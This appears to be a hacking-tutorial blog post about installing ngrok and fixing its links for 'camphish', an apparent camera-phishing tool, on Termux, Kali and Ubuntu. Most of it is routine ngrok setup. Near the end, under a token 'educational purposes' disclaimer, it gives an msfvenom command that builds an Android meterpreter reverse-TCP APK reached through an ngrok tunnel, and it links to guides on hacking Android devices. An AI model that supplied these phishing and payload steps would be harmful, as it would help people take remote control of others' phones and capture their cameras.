Ngrok direct link is not working on camphish? Ubuntu, Kali Linux, Termux | Ngrok direct link is not working

October 21, 2021

How to install Ngrok and fix ngrok link problem in Termux, Kali Linux, Ubuntu. Ngrok direct link is not working on camphish?

The code has some problem in printing the link (as it includes ip in it) but i found a solution. ngrok opens the tunnel at port 3333 so direct go there.
Please follow the stpes to get it done quickly.

Step 1: Go to that camphish folder
Step 2: Open terminal in folder ngrok exists
Step 3: Run the command written below
 $ ./ngrok http 3333

Now open a new termianl and run command to get the direct link
$ curl -s -N|sed 's#"#\n"\n#g'|grep https|head -1
The link will come in http and https like this https: //9775-***-***-*** your link will be different (as it contains ip address) but paste it in your browser and that will solve your problem. If you still want the direct link, please read below.


Termux And Functionality Click Here
Create Localhost Using Termux Click Here
TERMUXEasyPhishEFX Click Here
Hack An Android Device MSFVenom Click Here
Install Kali Nethunter In Termux Click Here
Download Youtube Playlist Termux Tutorial Click Here
Host A Payload Using Termux Click Here
What Is Termuxblack By Haxus Click Here

Before I share anything, I'd like to declare that this blog is only for educational purposes. I never intend to share anything encurrage the online crime. This blog is for education and awareness about cyber security. Hello and welcome back to EFX Tv Uk2blogger. Today we are going to learn how to


Ngrok direct link problem fixed Click Here
Termux And Functionality Click Here
Create Localhost Using Termux Click Here
Termux Storage Permission on All Android Click Here
TERMUXEasyPhishEFX Click Here
Hack An Android Device MSFVenom Click Here
Install Kali Nethunter In Termux Click Here
Download Youtube Playlist Termux Tutorial Click Here
Host A Payload Using Termux Click Here
What Is Termuxblack By Haxus Click Here

In this blog, you are going to get the answer to some of the questions listed below:-
  • What is Ngrok?
  • What is Ngrok in Termux and Termux Black by hax4us?
  • How to install ngrok in termux, Ubuntu, Kali Linux?
  • How do I fix Ngrok not generating links?
  • Why is Ngrok not working?
  • How do I fix Ngrok tunnel not found?
  • How do I create a link in Ngrok 2021?
  • Is Ngrok a VPN?
  • How do I get Ngrok Authtoken?
  • How do I start Ngrok?
  • How do you stop Ngrok?
  • How do I Password protect NGROK tunnel?
  • How do I share a folder on computer with authentication?
  • How do hackers generate payload using Ngrok?
  • Ngrok Link Problem Fixed Source Code
  • Let us answer all the questions one by one. Answers will be short and exact point to point to save your time. If you need more clarification please visit one of the links to get in touch to get a better understanding of NGROK.
    What is Ngrok?
    According to google, Ngrok is one of the best online tools to forward HTTP, TCP, TLS services from localhost to the public in the form of World Wild Web protocol. It uses a special kind of predefined link followed by (in the paid plan you can choose your subdomain) to share the services from localhost to WAN. An example is shown in the image below.
    What is Ngrok in Termux?
    Ngrok in Termux has similar binary files for all the operating systems with a different kind of encryption method. Binary files downloaded in mobile will not work on Linux similar way Linux files will not work on the Termux/android terminal. The best way to download the Ngrok executable is via chrome browser. If you try to download it from firefox or edge you may get the connectivity error.
    How do I fix Ngrok not generating links?
    Recently Ngrok has fixed some bugs and that required some API changes it caused many difficulties to all the users who have been using GitHub-based tools (for example Saycheese, black eye, hidden eye, online and it caused the Ngrok not to work. Which caused the error ngrok link not generated. To get this fixed you should watch this video

    Ngrok Link Problem Fixed 200% on Ubuntu, Kali Linux, Termux,

    and click here to view the source code you can add to your bash script to generate the link quickly. Part 2 is there in the description with a detailed explanation.
    How do I fix Ngrok tunnel not found?
    To fix Ngrok tunnel not found you need to make sure that the local HTTP server is running on your device on the same port your ngrok is hosted on. Now questions arise what is the local server? The local server stands for the HTTP service or server you are looking to forward. I've several videos on this topic which show the multiple ways to connect the Local PHP, Python, Ruby ...more... server (command for Linux php -S localhost:5555) with Ngrok to share it outside the local area network. Please run the command to avoid the mistake. Make sure same port for Ngrok and Local server too (server running on localhost:port)
    ./ngrok http 5555
    php -S localhost:5555
    ./ngrok http
    php -S
    ./ngrok http localhost:3333
    php -S localhost:5555
    How to install ngrok in termux, Ubuntu, Kali Linux?
    Step 1- Open Chrome browser on Kali Linux/Ubuntu/Termux
    Step 2- go to
    Step 3- Fill in all the details and click on signup.
    Step 4- Go to your email address and verify the account.
    Step 5- Click on the download button. Go to the directory file contains and unzip the file to get the ngrok binary file.
    Step 6- Run the command to extract the file and provide the execution permission and copy it to the bin directory. Just copy-paste the command in the directory where you have downloaded the ngrok zip file.
    $ ls|grep "ngrok-"|sed 's#^#unzip #g'|bash;sudo chmod +x ngrok;sudo cp ngrok /usr/bin/
    Step 7- Go to Chrome once again and scroll down the page to get Ngrok Authtoken. Paste the command in the terminal up to the same shown below (do not copy ./)
    ngrok authtoken 5zjdgfsdfsfd85c225HP5Red1TTxff5_7KpvV364cAgLV5G28gzff
    Ngrok has been installed.
    How do I know if Ngrok is installed?
    To confirm if ngrok is installed or not run the command shown mentioned below or visit the URL on your chrome browser it should say online.
    which ngrok 
    or visit the url
    How do I fix the Ngrok tunnel not found and port forward Ngrok?
    To fix the Ngrok tunnel not found we need to know the type of tunnels Ngrok has and how to run them one by one. Ngrok can run HTTP, TCP, and TLS (is under the paid plan) tunnels. Now let us check how to run the Ngrok HTTP and TCP tunnels from the terminal.
    Start Ngrok HTTP tunnel
    ./ngrok http localhost:port
    ./ngrok http localhost:5555
    ./ngrok http IP:port
    ./ngrok http
    Start Ngrok TCP tunnel
    ./ngrok tcp localhost:port
    ./ngrok tcp localhost:5555
    ./ngrok tcp IP:port
    ./ngrok tcp
    How do I stop the Ngrok tunnel?
    To stop the ngrok tunnel follow the ways written below:- 1- press ctrl c on your terminal or 2- type command on the terminal written below
    $ sudo pkill ngrok
    How do I create a link in Ngrok 2021?
    Run the command in the terminal to generate the link. Before that make sure you take care of the things mentioned below.

    For Termux users:-
    If you are using android 10 or the below version. Make sure you should turn off your wifi, turn on mobile data and hotspot. Signup to Ngrok using correct steps. Explained above. If you are using android 11, it is fine to use wifi or mobile data to generate the link but in both of the cases hotspot needs to be turned on android 11 supports wifi and hotspot together.
    For Desktop-based Linux users:-
    Make sure your device is running on LAN or Wifi which is connected to wifi (shared network). It will not work on a private network end-to-end connection.
    Run the commands to run and start Ngrok in the terminal.
    ./ngrok http localhost:5555
    ./ngrok tcp localhost:5555
    Is Ngrok a VPN?
    ngrok link provides independent encrypted links with targeted access to only the necessary service in your customer networks. Stop wasting time configuring and restarting clunky VPN tunnels for each of your integrations. ngrok works across all platforms with a simple YAML configuration file.
    How do I find my Ngrok URL?
    You can find the ngrok URL in the terminal and the browser on the same device tunnel has started. Visit the link to see the ngrok links on your device
    How do I Password protect NGROK tunnel?
    Run the command in the terminal to password protect your tunnel (Please change username and password with the credentials you need to keep:
    ngrok http -auth="uname:changeme" 8080
    How do I share a folder on computer with authentication?
    To share the folder on your Linux computer with auth username and password over the link please run the command in your terminal. (put the absolute path of the directory just after file://)
    ngrok http -auth="uname:changeme" file:///home/efx/Downloads/
    You can share the directory without a password too.
    ngrok http file:///home/efx/Downloads/
    To read the official ngrok documentation must visit Ngrok signupg page
    To share the file, payload, entire directory, and lots more you can run the tool created by EFX Tv known as EMSF.
    How do hackers generate payload using Ngrok?
    Before I share that with you, I'd like to declare that this blog is only for educational purposes. I never intend to share anything that damages our society. This is just for your education and awareness about cyber security. To understand the concept behind this please follow the steps written below:-
    Step 1- Install and configure the NGROK
    Step 2- Install Metasploit in your Linux, Kali Linux, Ubuntu, Termux.
    Step 3- Switch to the sudo user run the command shown below (Termux users can do it by running the command cd $HOME). For Termux users be in the HOME directory no sudo required.


    cd $HOME

    Ubuntu Kali Linux Parrot OS etc

    sudo su
    Step 4- Run ngrok tcp tunnel. 5555 is your system port and you will get another port with the ngrok link that will be your VPN port. Explained in the image below. Run the command first. Image output can be different as all the op ports are unique for different users.
    ngrok tcp 5555
    How do I generate the payload using Ngrok?
    To generate the payload using Ngrok (Metasploit) you need to install the ngrok and Metasploit first. After that understand the image attached below. Please visit the article to know about Metasploit payload using NGROK TCP tunnel.
    msfvenom –p android/meterpreter/reverse_tcp LHOST= LPORT=15003 R > payload-name.apk

    Please watch the video to understand the concept further:-

    Ngrok direct link is not working on camphish

    Click here for full screen video